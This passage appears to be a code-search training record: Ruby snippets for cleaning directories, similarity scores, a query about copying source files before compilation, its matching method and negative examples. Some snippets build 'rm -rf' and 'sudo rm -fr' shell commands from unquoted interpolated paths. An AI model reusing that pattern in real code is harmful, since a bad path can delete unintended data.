"def clean\n cache = Cache.instance\n # remove all built files\n cache.targets(false).each do |target|\n cache.remove_target(target)\n FileUtils.rm_f(target)\n end\n # remove all created directories if they are empty\n cache.directories(false).sort {|a, b| b.size <=> a.size}.each do |directory|\n cache.remove_directory(directory)\n next unless File.directory?(directory)\n if (Dir.entries(directory) - ['.', '..']).empty?\n Dir.rmdir(directory) rescue nil\n end\n end\n cache.write\n end",
"def clean\n FileUtils.remove_dir(@log_dir, true)\n end",
"def clean_tmp_upload_dir\n FileUtils.rm_r(tmp_upload_dir) if self.tmp_upload_dir && File.directory?(self.tmp_upload_dir)\n end",
"def cleanup_dirs\n @cleanup_dirs ||= ['.']\n end",
"def clean_tmp_dir\n system \"rm -rf #{TMP_PATH}\"\n system \"mkdir #{TMP_PATH}\"\n yield\n system \"rm -rf #{TMP_PATH}\"\n system \"mkdir #{TMP_PATH}\"\n end",
"def check_or_create_working_dir\n unless Dir.exists?(@working_directory)\n if File.writable?(@working_directory.split(\"/\")[0...-1].join(\"/\"))\n Dir.mkdir(@working_directory)\n return true if Dir.exists?(@working_directory)\n end\n end\n Loggers::Main.log.warn \"Creation of #{@working_directory} failed!\"\n end",
"def cleanup\n if File.exist?(@scalerui_dir)\n print \"Cleaning up directories...\"\n FileUtils.rm_r(@scalerui_dir)\n puts \"done\"\n else\n puts \"Nothing to clean up!\"\n end\n end",
"def clean\n FileUtils.rm_rf(\"#{ROOT_DATA_FOLDER}/.\", secure: true)\n unless File.directory?(ROOT_DATA_FOLDER)\n FileUtils.mkdir_p(ROOT_DATA_FOLDER)\n end\n end",
"def createEmptyFolder(path)\n FileUtils.remove_dir(path) if Dir.exist?(path)\n FileUtils.mkdir_p(path)\nend",
"def fileCleanPath(pathName) \n pathName.mkpath()\n begin\n pathName.rmtree()\n rescue\n puts \"Cannot delete: \" + pathName.to_s\n end\n pathName.mkpath()\nend",
"def reset_signup_folder\n FileUtils.rm_rf('./tmp/signup')\nend",
"def clean!\n FileUtils.rm(self[:build_path]) if File.exist?(self[:build_path])\n FileUtils.rm(self[:staging_path]) if File.exist?(self[:staging_path])\n return self\n end",
"def clean_installation\n clean_paths.each { |path| FileUtils.rm_rf(path) }\n end",
"def clean_dir_root\n File.join(root_dir, \"test\", \"tmp\", \"cleanreps\")\n end",
"def clean()\n\t\ttmpdir = Dir.open(@tmpout) do |dir|\n\t\t\tdir.each do |file|\n\t\t\t\tif file != \".\" and file != \"..\" then\n\t\t\t\t\tFile.unlink(@tmpout + \"/\" + file)\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\tDir.rmdir @tmpout\n\tend",
"def cleanup\n if dir and File.exists?(dir)\n FileUtils.rm_rf(dir)\n end\n\n nil\n end",
"def clean_working_directory_check\n commit_count_check = `git status`\n if (!(commit_count_check.include? \"Your branch is up-to-date with 'origin/master'.\") &&\n !(commit_count_check.include? \"nothing to commit, working directory clean\")) ||\n (commit_count_check.include? \"Changes not staged for commit:\")\n abort(\"ABORTING... please commit and push any local changes before atte\"\\\n \"mpting to create a new tag\")\n end\n end",
"def clean!\n clean_installation if !local?\n end",
"def cleanUpWorkingFiles()\n system(\"rm -f #{@tripFile} #{routeFile} #{routeAltFile}\") ;\n end",
"def cleanup(build_dir)\n build_dir = Pathname(build_dir)\n tmp_build_dir = Pathname('.temp-build')\n\n # copy over files we need to keep\n if File.directory?(build_dir)\n build_dir.glob(\"**/all-product-headers.yaml\").each do |file|\n intermediate = Pathname(file).relative_path_from(build_dir).dirname\n destination_dir = tmp_build_dir + intermediate\n\n FileUtils.mkdir_p(destination_dir)\n FileUtils.mv(file, destination_dir)\n end\n\n build_dir.rmtree if build_dir.directory?\n FileUtils.mv(tmp_build_dir, build_dir)\n end\nend",
"def teardown\n Dir.chdir '..'\n FileUtils.rm_rf @tempdirname\n end",
"def clearDistributionDirectory(projectDir)\n distDir = projectDir.to_s + '/dist'\n FileUtils.rm_rf(distDir)\n FileUtils.mkdir_p(distDir)\nend",
"def delete_dir!(path)\n # do nothing, because there's no such things as 'empty directory'\n end",
"def clean!\n stop\n remove_instance_dir!\n FileUtils.remove_entry(config.download_path) if File.exists?(config.download_path)\n FileUtils.remove_entry(config.tmp_save_dir, true) if File.exists? config.tmp_save_dir\n md5.clean!\n FileUtils.remove_entry(config.version_file) if File.exists? config.version_file\n end",
"def tidy_up\n return if DEBUG\n\n puts heading(\"Tidying up PWD\")\n\n FileUtils.remove(Dir[\"#{FileUtils.pwd}/bugsnag-*.tgz\"])\nend",
"def destroy()\n\n path = self.get_dir\n FileUtils.remove_entry_secure(path, true)\n _clean_dir(File.dirname(path))\n\n super()\n end",
"def remove_structure\n rm_rf target_dir\n end",
"def make_tmp_dir\n FileUtils.mkdir_p @log_dir\n Dir[\"#{@log_dir}/*\"].each do |file|\n FileUtils.rm_rf file\n end\n end",
"def clean_up\n execute(\"rm -rf #{namespace_dir}\")\n end",
"def purge_directory(path)\n remove_directory(path)\n create_directory(path)\n end",
"def purge_directory(path)\n remove_directory(path)\n create_directory(path)\n end",
"def cleanTmp\n ts_str = \"/tmp/d\" + Date.today.strftime(\"%Y%m%d\") + \"-*\"\n Gitchefsync.logger.info \"clean up of #{ts_str}\"\n FS.cmdNoError \"sudo rm -fr #{ts_str}\"\n end",
"def teardown\n FileUtils.chdir(@default_folder)\n FileUtils.rm_r('tmp')\n\n assert_false(File.exists?('tmp'))\n end",
"def in_pristine_fake_libraries_dir(example)\n d = Dir.mktmpdir\n begin\n # write a yaml file containing the current directory\n dummy_config = { \"directories\" => { \"user\" => d.to_s } }\n @arduino_dir = Pathname.new(d)\n @libraries_dir = @arduino_dir + \"libraries\"\n Dir.mkdir(@libraries_dir)\n\n f = File.open(@config_file, \"w\")\n begin\n f.write dummy_config.to_yaml\n f.close\n example.run\n ensure\n begin\n File.unlink(@config_file)\n rescue Errno::ENOENT\n # cool, already done\n end\n end\n ensure\n if ArduinoCI::Host.needs_symlink_hack?\n stdout, stderr, exitstatus = Open3.capture3('cmd.exe', \"/c rmdir /s /q #{ArduinoCI::Host.pathname_to_windows(d)}\")\n unless exitstatus.success?\n puts \"====== rmdir of #{d} failed\"\n puts stdout\n puts stderr\n end\n else\n FileUtils.remove_entry(d)\n end\n end\n end",
"def clean_up\n pathname.delete if pathname.exist?\n end",
"def create_server_dir\n @task.remove_dir @path\n @task.empty_directory @path\n end",
"def remove_empty_directory(path = nil)\r\n dir = path || File.dirname(full_path)\r\n dir.gsub!(/(\\/+\\.\\.?\\/*)*$/, '')\r\n system_files = %w(Thumbs.db .DS_Store)\r\n if File.directory?(dir) and !File.symlink?(dir) and (Dir.entries(dir) - %w(. ..) - system_files).empty?\r\n system_files.each { |sys| File.delete(\"#{dir}/#{sys}\") if File.exists?(\"#{dir}/#{sys}\") }\r\n Dir.rmdir(dir)\r\n remove_empty_directory(dir.gsub(/\\/+[^\\/]*\\/*$/, ''))\r\n end\r\n end",
"def rm_and_mkdir(dir)\n raise \"don't do this\" if dir == \"\"\n run \"rm -rf #{dir} && mkdir -p #{dir}\"\n end",
"def remove_basedir\n FileUtils.remove_entry_secure(@basedir) if @basedir.exist?\n end",
"def destroy_scratch_dir\n FileUtils.rm_rf( @scratch_dir )\n end",
"def clear\n raise \"unsafe test stage directory -- #{Dir.pwd}\" unless /#{Dir.tmpdir}/ =~ Dir.pwd\n Dir['*'].each do |path|\n FileUtils.rm_r(path)\n end\n end",
"def delete_temp_dir\n\t\tself.rm_str(\" -rf \", @@dir_temp)\n\tend",
"def ensure_directory\n FileUtils.mkdir_p(to_s)\n self\n end",
"def setup_tmp_dir(koan)\n FileUtils.mkdir \"tmp\" unless Dir.exist? \"tmp\"\n if Dir.exist? \"tmp/#{koan.name}\"\n FileUtils.rm_rf \"tmp/#{koan.name}/*\"\n puts \"rm -rf tmp/#{koan.name}/*\"\n else\n FileUtils.mkdir \"tmp/#{koan.name}\"\n puts \"mkdir tmp/#{koan.name}\"\n end\nend",
"def cleanall\n FileUtils.rm_r(OUTPUT_DIR, force: true, verbose: true)\n end",
"def clean_file\n staged_root.join(\"clean.sh\")\n end",
"def docClean\n dir = Pathname.new pathDocuments\n fileCleanPath(dir)\nend",
"def preclean_project\n # Clean-up non-useful files (if any)\n clean_msg = `make clean 2>&1`\n @log_file.puts \"\\nNettoyage du répertoire :\\n\\n#{clean_msg}\"\n \n # I want to be sure...\n FileUtils::rm_f Dir.glob(\"*.o\")\n FileUtils::rm_f Dir.glob(\"*~\")\n end",
"def clean_app()\n wd = FileUtils.pwd()\n FileUtils.rm_f( [\n '/app/assets/*',\n '/app/components/*',\n '/app/controllers/*',\n '/app/helpers/*',\n '/app/models/*',\n '/app/views/*'\n ].collect!{|e| Dir.glob(wd + e)}.flatten.compact )\n end",
"def create_dirs\n FileUtils.mkdir_p(@work_dir) unless File.exist?(@work_dir)\n end",
"def clean_build_directory\n FileUtils.rm_rf Dir.glob(File.join(@project.build_path, '*'))\n end",
"def prepare_workspace\n # create the local backup directory if it doesn't exist\n puts \"Checking workspace...\" if options[:verbose]\n unless File.directory?(backup_directory)\n Dir.mkdir(backup_directory)\n end\n unless File.directory?(temp_directory)\n Dir.mkdir(temp_directory)\n end\n Dir.chdir(backup_directory)\n # check local count against existing backups and delete if needed\n puts \"Checking and clearing archives...\" if options[:verbose]\n backup_files = Dir.glob('*').sort_by{ |f| File.ctime(f) }\n if (backup_files.count > (local_count * total_databases))\n number_to_remove = backup_files.count - (local_count * total_databases)\n backup_files.slice(0, number_to_remove).each { |f| File.delete(f) }\n end\n end",
"def prepare\n FileUtils.rm_rf(output_dir)\n FileUtils.mkdir_p(output_dir)\n end",
"def prepare\n FileUtils.rm_rf(output_dir)\n FileUtils.mkdir_p(output_dir)\n end",
"def remove_tmp_dir\n if Dir.exist?(File.expand_path('../tmp/', File.dirname(__FILE__)))\n FileUtils.rm_rf(File.expand_path('../tmp/', File.dirname(__FILE__)))\n end \n end",
"def prepare_target_dir\n begin\n FileUtils.mkdir(@output_dir)\n copy_default_files\n rescue Errno::EEXIST\n puts \"-- #{output_dir} already exists -- canceling initialization. \"\n return\n end\n end",
"def delete\n File.delete fullpath\n dirname = File.dirname(fullpath)\n while dirname != root\n Dir.rmdir(dirname)\n dirname = File.dirname(dirname)\n end\n rescue Errno::ENOTEMPTY\n end",
"def cleanup_workspace\n FileUtils.rm_rf(@workspace)\n end",
"def _prepare_dir(project)\n tmp_path = Rails.root.join(\"tmp/git_checkout/#{Rails.env}/#{project.id}/#{project.path_with_namespace}\")\n tmp_path.mkpath unless tmp_path.exist?\n\n return tmp_path\n end",
"def spec_clean\n Dir.chdir(project_root) do\n Debug.log(\"cd to #{project_root}\")\n fixtures = File.join(profile_path, 'spec', 'fixtures', 'modules')\n modules = File.join(project_root, 'modules')\n\n abort if fixtures == '' || !fixtures\n abort if modules == '' || !modules\n\n FileUtils.rm_rf(fixtures)\n FileUtils.rm_rf(modules)\n end\n Debug.log \"cd to #{Dir.pwd}\"\n end",
"def clear_base_location\n tmpdir = dir + \"base_removed\"\n base_location.move(tmpdir)\n base_location.mkdir\n tmpdir.delete\n end",
"def clean(ant)\n @build_dir.delete\n end",
"def empty_directory(directory)\n return unless File.exist?(directory)\n\n FileUtils.remove_entry(directory)\n FileUtils.mkdir(directory)\nend",
"def rmdir_if_empty_ie path\n rmdir path if File.exist?(path) && dir_empty?(path)\n end",
"def prepare_local_folder(local_file_path)\n FileUtils.mkdir_p(backup_folder)\n File.delete(local_file_path) if File.exist?(local_file_path)\n end",
"def rmdir() Dir.rmdir( expand_tilde ) end",
"def cleanup_state\n delete_if_exists(state_file_path)\n delete_if_exists(chef_file_path)\n delete_if_exists(past_scripts_path)\n delete_if_exists(log_path)\n end",
"def prepare\n #let's mark ourselves as dirty if any of our dependents are dirty\n if dependents.values.detect(&:'dirty?')\n mark_dirty\n end\n dependents.values.each {|child| child.prepare}\n\n if dirty?\n delete_clean_dir\n end\n\n #if the directory is there, we don't need to do anything\n if !File.exist?(clean_dir)\n Dir.chdir clean_dir_parent do\n mark_dirty\n if pristine_exists? && !pristine_dirty?\n copy_pristine_here\n else\n build_here\n end\n unmark_dirty\n\n copy_clean_to_pristine\n end\n end\n end",
"def cleanup\n if ::File.exist?(chef_backup_dir) # rubocop:disable Style/GuardClause\n converge_by(\"removing #{chef_backup_dir}\") do\n FileUtils.rm_rf chef_backup_dir\n end\n end\nend",
"def clean_dir_parent\n if subpath.empty?\n clean_dir_root\n else\n File.join clean_dir_root, subpath\n end\n end",
"def clean(name)\n return false if exists?(name)\n path = File.join(directory, dir_name(name))\n FileUtils.rm_rf(path)\n end",
"def git_clean_filesystem\n mysystem('git clean -f -d -x 2> /dev/null > /dev/null')\n end",
"def cleanup_files\n FileUtils.rm_rf(File.join(Rails.root, \"tmp\"))\n end",
"def clean\n if File.exist?(@destination)\n Monolith.formatter.clean(@cookbook, @destination)\n FileUtils.rm_rf(@destination)\n true\n else\n rel_dest = Monolith.formatter.rel_dir(@destination)\n Monolith.formatter.skip(@cookbook, \"#{rel_dest} doesn't exist\")\n nil\n end\n end",
"def pkg_clean\n sysprint \"#{@name} clean\"\n\n FileUtils::rm_rf(@objdir, :secure => true)\n end"
] |
[
"0.76405054",
"0.7408624",
"0.7186648",
"0.71587247",
"0.70376396",
"0.70326406",
"0.7000289",
"0.69984543",
"0.6984926",
"0.6920283",
"0.6874696",
"0.67769",
"0.67683226",
"0.67443323",
"0.67343736",
"0.6714536",
"0.6714536",
"0.6690504",
"0.66625756",
"0.66347367",
"0.66268283",
"0.66055816",
"0.6603225",
"0.6598229",
"0.6594854",
"0.65693825",
"0.6556986",
"0.6552396",
"0.6550848",
"0.6545083",
"0.65215975",
"0.6512891",
"0.65003484",
"0.6490946",
"0.64760345",
"0.6475248",
"0.6473033",
"0.6467839",
"0.64574534",
"0.6434629",
"0.64325655",
"0.6416905",
"0.64084625",
"0.63868976",
"0.63636374",
"0.63605535",
"0.6359141",
"0.63554585",
"0.63490325",
"0.63428235",
"0.63276386",
"0.62964195",
"0.628384",
"0.62822443",
"0.62685174",
"0.62685174",
"0.6267299",
"0.625938",
"0.62581086",
"0.6254412",
"0.62516874",
"0.6248206",
"0.6236415",
"0.6212771",
"0.62017846",
"0.61924154",
"0.6189925",
"0.61891615",
"0.617603",
"0.6174983",
"0.61735684",
"0.6156471",
"0.6153765",
"0.6144969",
"0.6134037",
"0.6123452",
"0.6119587",
"0.6113484",
"0.61133087",
"0.61103344",
"0.6108131",
"0.61032224",
"0.6097397",
"0.6088153",
"0.6087841",
"0.60873157",
"0.6080542",
"0.6080131",
"0.60792184",
"0.60781854",
"0.60759956",
"0.60756296",
"0.607121",
"0.60699415",
"0.6059479",
"0.6058849",
"0.6051428",
"0.60336894",
"0.603163",
"0.60238576"
] |
0.82474655
|
0
|
Make sure that any files or globs of files in :include_source_files are copied into the working directory before compilation
|
def process_other_source_files
files = @options[:include_source_files].flatten
files.each do |f|
FileUtils.cp Dir[f], @working_dir
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def update include_dirs, source\r\n if not @source_files.include? source\r\n @source_files << source\r\n end\r\n update_depends include_dirs, source\r\n end",
"def setup_source_files\n project.sources.each do |src|\n # Figure out where stuff should come from and go to\n source_file = src\n object_file = objectsify src\n compile_task object_file, source_file\n end#project.sources.each\n end",
"def copy_include_files\n include_directory = Pathname.new(@env[\"package.directory\"]).join(\"include\")\n\n @env[\"package.files\"].each do |from, dest|\n # We place the file in the include directory\n to = include_directory.join(dest)\n\n @env[:ui].info I18n.t(\"vagrant.actions.general.package.packaging\", :file => from)\n FileUtils.mkdir_p(to.parent)\n\n # Copy direcotry contents recursively.\n if File.directory?(from)\n FileUtils.cp_r(Dir.glob(from), to.parent, :preserve => true)\n else\n FileUtils.cp(from, to, :preserve => true)\n end\n end\n end",
"def included_files; end",
"def source_files; end",
"def test_automatically_sets_include_sources_argument\n assert_equal( 'test/fixtures/target', @cmd.include_sources )\n end",
"def compile_files(files)\n files.each do |base_path|\n # We do this second glob in case the path provided in the tayfile\n # references a compiled version\n Dir[@base_dir.join('src', base_path + '*')].each do |path|\n path = Pathname.new(path).relative_path_from(@base_dir.join('src'))\n file_in_path = @base_dir.join('src', path)\n file_out_path = asset_output_filename(@output_dir.join(path), @sprockets.engines.keys)\n\n if @sprockets.extensions.include?(path.extname)\n content = @sprockets[file_in_path].to_s\n else\n content = File.read(file_in_path)\n end\n\n FileUtils.mkdir_p(file_out_path.dirname)\n File.open(file_out_path, 'w') do |f|\n f.write content\n end\n end\n end\n end",
"def build_sources\n sources = [File.join(source_dir, 'jasmine-webos-core.js'),\n File.join(source_dir, 'proxy-app-assistant.js')]\n\n sources += Dir.glob(\"#{source_dir}/**/*.js\").reject { |f| sources.include?(f) }.sort\n sources += Dir.glob(\"#{plugin_dir}/spec/helpers/*.js\")\n sources\nend",
"def copy_sources!\n FileUtils.cp_r(TEMPLATES + 'sources/.', @sources_path)\n end",
"def add_files(frameworks_build_phase, files, lib_group, relative_source_directory)\n\tfiles.each { |file|\n\t\tif file != \".\" && file != \"..\"\n\t\t\ta_ref = lib_group.new_file(relative_source_directory + file)\n\t\t\tframeworks_build_phase.add_file_reference(a_ref, true)\n\t\tend\n\t}\nend",
"def all_files_included?\n file_paths = files.map { |f| File.join(package_path, f[:path]) }\n \n package_files = if defined? package_id\n Dir.glob(File.join(package_path, package_id, \"**\", \"*\"))\n else\n Dir.glob(File.join(package_path, 'files', '**', '*'))\n end\n package_files = package_files.select { |f| File.file? f }\n\n package_files.each do |p|\n errors.add :coverage, \"#{p} is in the package but is not covered by the\" +\n \" representation(s)\" unless file_paths.include?(p) \n end\n \n return errors.on(:coverage).nil?\n\n end",
"def add_source_files_references\n UI.message '- Adding source files' do\n add_file_accessors_paths_to_pods_group(:source_files, nil, true)\n end\n end",
"def add_template_repository_to_source_path\n source_paths.unshift(File.dirname(__FILE__))\nend",
"def source_files\n @source_files ||= find_files( @source_search_paths, @source_file_extension ).uniq\n @source_files\n end",
"def source_paths\n [__dir__]\nend",
"def source_paths\n [__dir__]\nend",
"def in_source_dir(*paths); end",
"def copy_files_to_target\n COMMON_RAMMER_FILES.each do |file|\n source = File.join(\"#{@gem_path}/lib/modules/common/\",file)\n FileUtils.cp(source,\"#{@project_name}\")\n $stdout.puts \"\\e[1;32m \\tcreate\\e[0m\\t#{file}\"\n end\n end",
"def bind_files\n @files.each do |source, destination|\n @files[source] = File.join('wix', 'src', destination)\n end\n end",
"def setup_test_files\n project.test_sources.each do |src|\n compile_task objectsify(src), src\n end\n end",
"def source_paths\n [File.expand_path(File.dirname(__FILE__))]\nend",
"def source_paths\n [File.expand_path(File.dirname(__FILE__))]\nend",
"def source_paths\n [File.expand_path(File.dirname(__FILE__))]\nend",
"def source_paths\n [File.expand_path(File.dirname(__FILE__))]\nend",
"def update_source_paths\n source_paths.unshift(root_dir)\n end",
"def cpp_files\n source_files(CPP_EXTENSIONS)\n end",
"def add_files(*files)\n @source_paths &= files\n end",
"def cover_source_by source, specfile\n _source = File.expand_path( \"../../../#{source}\", __FILE__ )\n _spec = File.expand_path(\"../../#{specfile}\", __FILE__)\n FileUtils.touch(_spec) if File.mtime(_source) > File.mtime(_spec)\n File.mtime(_source) <= File.mtime(_spec)\nend",
"def find_includes include_dirs, src\r\n includes = Rake::CParser.parse_file_includes src\r\n res = includes.collect { |inc|\r\n search_includes include_dirs, src, inc\r\n }\r\n res.compact\r\n end",
"def run\n require 'find'\n\n # Get compiled files\n # FIXME: requires #build_reps to have been called\n all_raw_paths = site.compiler.reps.map(&:raw_path)\n compiled_files = all_raw_paths.flatten.compact.select { |f| File.file?(f) }\n\n # Get present files and dirs\n present_files = []\n present_dirs = []\n Find.find(site.config[:output_dir] + '/') do |f|\n present_files << f if File.file?(f)\n present_dirs << f if File.directory?(f)\n end\n\n # Remove stray files\n stray_files = (present_files - compiled_files)\n stray_files.each do |f|\n next if filename_excluded?(f)\n delete_file(f)\n end\n\n # Remove empty directories\n present_dirs.reverse_each do |dir|\n next if Dir.foreach(dir) { |n| break true if n !~ /\\A\\.\\.?\\z/ }\n next if filename_excluded?(dir)\n delete_dir(dir)\n end\n end",
"def load_file_path!\n @files = FilepathScanner.call(\n include_paths,\n exclude_path_regexps,\n recursive_scan: recursive_include\n )\n end",
"def safe_cp(from, to, owner, group, cwd = '', include_paths = [], exclude_paths = [])\n credentials = ''\n credentials += \"-o #{owner} \" if owner\n credentials += \"-g #{group} \" if group\n excludes = find_command_excludes(from, cwd, exclude_paths).join(' ')\n\n copy_files = proc do |from_, cwd_, path_ = ''|\n cwd_ = File.expand_path(File.join('/', cwd_))\n \"if [[ -d #{File.join(from_, cwd_, path_)} ]]; then \" \\\n \"#{dimg.project.find_path} #{File.join(from_, cwd_, path_)} #{excludes} -type f -exec \" \\\n \"#{dimg.project.bash_path} -ec '#{dimg.project.install_path} -D #{credentials} {} \" \\\n \"#{File.join(to, '$(echo {} | ' \\\n \"#{dimg.project.sed_path} -e \\\"s/#{File.join(from_, cwd_).gsub('/', '\\\\/')}//g\\\")\")}' \\\\; ;\" \\\n 'fi'\n end\n\n commands = []\n commands << [dimg.project.install_path, credentials, '-d', to].join(' ')\n commands.concat(include_paths.empty? ? Array(copy_files.call(from, cwd)) : include_paths.map { |path| copy_files.call(from, cwd, path) })\n commands << \"#{dimg.project.find_path} #{to} -type d -exec \" \\\n \"#{dimg.project.bash_path} -ec '#{dimg.project.install_path} -d #{credentials} {}' \\\\;\"\n commands.join(' && ')\n end",
"def execute\n res = @include_list.map { |re_file| IO.read File.join(File.dirname(@file),re_file) }\n res << IO.read(@file)\n res.join \"\\n\"\n end",
"def compile\n tmpdir = Dir.mktmpdir\n Dir.chdir(tmpdir) do |source_dir, build_dir|\n yield source_dir, @build_dir\n end\n\n puts \"Packaging the following files/dirs:\"\n pipe \"ls #{@build_dir}\"\n ensure\n if ENV['DEBUG']\n puts \"Source dir: #{tmpdir}\"\n else\n FileUtils.rm_rf(tmpdir)\n end\n end",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require \"tmpdir\"\n tempdir = Dir.mktmpdir(\"template-tmp\")\n source_paths.unshift(tempdir + \"/rails/muffi_template\")\n at_exit {FileUtils.remove_entry(tempdir)}\n git clone: [\n \"--quiet\",\n \"https://github.com/abtion/guidelines.git\",\n tempdir\n ].map(&:shellescape).join(\" \")\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def add_template_repo_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require \"tmpdir\"\n source_paths.unshift(tempdir = Dir.mktmpdir(\"springer-\"))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n \"--quiet\",\n \"https://github.com/troyizzle/springer.git\",\n tempdir\n ].map(&:shellescape).join(\" \")\n\n if (branch = __FILE__[%r{springer/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def source_paths\n Array(super) +\n [File.expand_path(File.dirname(__FILE__))]\nend",
"def source_paths\n Array(super) +\n [File.expand_path(File.dirname(__FILE__))]\nend",
"def source_paths\n Array(super) +\n [File.expand_path(File.dirname(__FILE__))]\nend",
"def source_paths\n Array(super) +\n [File.expand_path(File.dirname(__FILE__))]\nend",
"def source_paths\n Array(super) +\n [File.expand_path(File.dirname(__FILE__))]\nend",
"def source_paths\n Array(super) +\n [File.expand_path(File.dirname(__FILE__))]\nend",
"def collect_sources_and_toolchains\n sources_to_build = {}\n\n exclude_files = Set.new\n exclude_sources.each do |p|\n if p.include?(\"..\")\n Printer.printError \"Error: Exclude source file pattern '#{p}' must not include '..'\"\n return nil\n end\n\n Dir.glob(p).each {|f| exclude_files << f}\n end\n files = Set.new # do not build the same file twice\n\n add_to_sources_to_build(sources_to_build, exclude_files, sources)\n\n source_patterns.each do |p|\n if p.include?(\"..\")\n Printer.printError \"Error: Source file pattern '#{p}' must not include '..'\"\n return nil\n end\n\n globRes = Dir.glob(p)\n if (globRes.length == 0)\n Printer.printWarning \"Warning: Source file pattern '#{p}' did not match to any file\"\n end\n add_to_sources_to_build(sources_to_build, exclude_files, globRes, tcs4source(p))\n end\n return sources_to_build\n end",
"def source_paths\n Array(super) + \n [File.expand_path(File.dirname(__FILE__))]\nend",
"def source_paths\n Array(super) + \n [File.expand_path(File.dirname(__FILE__))]\nend",
"def source_paths\n Array(super) + \n [File.expand_path(File.dirname(__FILE__))]\nend",
"def copy_files\r\n %w{_config.dev.yml about.md feed.xml gulpfile.js index.html}.each do |file|\r\n copy_file file\r\n end\r\n end",
"def copy_common_templates\n %w[\n .gitignore .rspec Gemfile MIT-LICENSE Rakefile\n ].each do |tpl|\n template(\"../common/#{tpl}\", \"#{extension_name}/#{tpl}\")\n end\n end",
"def create_source_files\n empty_directory(File.join(target_dir, \"lib/kitchen/driver\"))\n\n create_template(\n \"version.rb.erb\",\n \"lib/kitchen/driver/#{name}_version.rb\"\n )\n create_template(\n \"driver.rb.erb\",\n \"lib/kitchen/driver/#{name}.rb\"\n )\n end",
"def write_static_files\n debug_msg \"Copying static files\"\n options = { :verbose => $DEBUG_RDOC, :noop => @options.dry_run }\n static_files = Pathname.\n glob(@template_dir.to_s + '/**/*').\n reject { |f| f.extname == '.erb' }\n static_files.sort.each do |source_path|\n out_path = @output_dir + source_path.relative_path_from(@template_dir)\n if source_path.directory?\n out_path.mkpath unless @options.dry_run\n else\n FileUtils.cp source_path.to_s, out_path.dirname.to_s, **options\n end\n end\n end",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require \"tmpdir\"\n source_paths.unshift(tempdir = Dir.mktmpdir(\"vine-\"))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n \"--quiet\",\n \"https://github.com/bmartel/vine.git\",\n tempdir\n ].map(&:shellescape).join(\" \")\n\n if (branch = __FILE__[%r{vine/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def IncludeClobberTargets(*includes)\n @ProjectFileLoader.CurrentlyLoadedProjectFile().ClobberList.include(includes)\n end",
"def includes(*paths)\n self.included_files.concat(expand_globs(paths))\n end",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require \"tmpdir\"\n source_paths.unshift(tempdir = Dir.mktmpdir(\"siderail-\"))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n \"--quiet\",\n YARG_REPO,\n tempdir\n ].map(&:shellescape).join(\" \")\n\n if (branch = __FILE__[%r{siderail/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def source_files(extensions)\n source_dir = Pathname.new(info[\"library\"][\"source_dir\"])\n ret = if one_point_five?\n code_files_in_recursive(source_dir, extensions)\n else\n [source_dir, source_dir + \"utility\"].map { |d| code_files_in(d, extensions) }.flatten\n end\n\n # note to future troubleshooter: some of these tests may not be relevant, but at the moment at\n # least some of them are tied to existing features\n ret.reject { |p| vendor_bundle?(p) || in_tests_dir?(p) || in_exclude_dir?(p) }\n end",
"def compile_coffeescript source_path, destination_path\n # Jasmine testing directories\n Dir.mkdir(File.dirname(File.expand_path(destination_path, __FILE__))) unless File.exists?(File.dirname(File.expand_path(destination_path, __FILE__)))\n \n # Compile coffee script from the project into the test directory\n root = File.expand_path(source_path, __FILE__)\n destination_dir = File.expand_path(destination_path, __FILE__)\n glob = File.expand_path(\"**/*.js.coffee\", root)\n Dir.glob(glob).each do |srcfile|\n srcfile = Pathname.new(srcfile)\n destfile = srcfile.sub(root, destination_dir).sub(\".coffee\", \"\")\n FileUtils.mkdir_p(destfile.dirname)\n File.open(destfile, \"w\") {|f| f.write(CoffeeScript.compile(File.new(srcfile)))}\n end\n end",
"def link_include_file(file); end",
"def link_include_file(file); end",
"def stage_copy(source_dir)\n test_dir = File.dirname(caller[0])\n stage_clear\n srcdir = File.join(test_dir, source_dir)\n Dir[File.join(srcdir, '*')].each do |path|\n FileUtils.cp_r(path, '.')\n end\n end",
"def include(source, base=nil)\n\t\t\tsource = File.join(base, source.to_s) unless base.nil?\n\t\t\t@sources << Source.new(source.to_s, type: @type)\n\t\tend",
"def copy(source_dir)\n test_dir = File.dirname(caller[0])\n stage_clear\n srcdir = File.join(test_dir, source_dir)\n Dir[File.join(srcdir, '*')].each do |path|\n FileUtils.cp_r(path, '.')\n end\n end",
"def add_files_to_project\n # add/overwrite some files\n mkdir('config/init')\n mkdir_p('lib/tasks')\n cp_r(Dir.glob('../files/*'), '.')\n # gem changed the api in version 1.3.2, I think, at least it is changed\n # in version 1.3.4, so the following merb hack is necessary for merb\n # 1.0.11\n # TODO: this should be generically performed outside of the spec2merb script\n if Versionomy.parse(`gem --version`) < Versionomy.parse('1.3.4')\n raise Exception.new 'Please upgrade rubygems to at least 1.3.4 (sudo gem update --system)'\n end\n if File.exist?('tasks/merb.thor/gem_ext_4.rb')\n rm('tasks/merb.thor/gem_ext.rb') if File.exist?('tasks/merb.thor/gem_ext.rb')\n mv('tasks/merb.thor/gem_ext_4.rb', 'tasks/merb.thor/gem_ext.rb')\n end\n end",
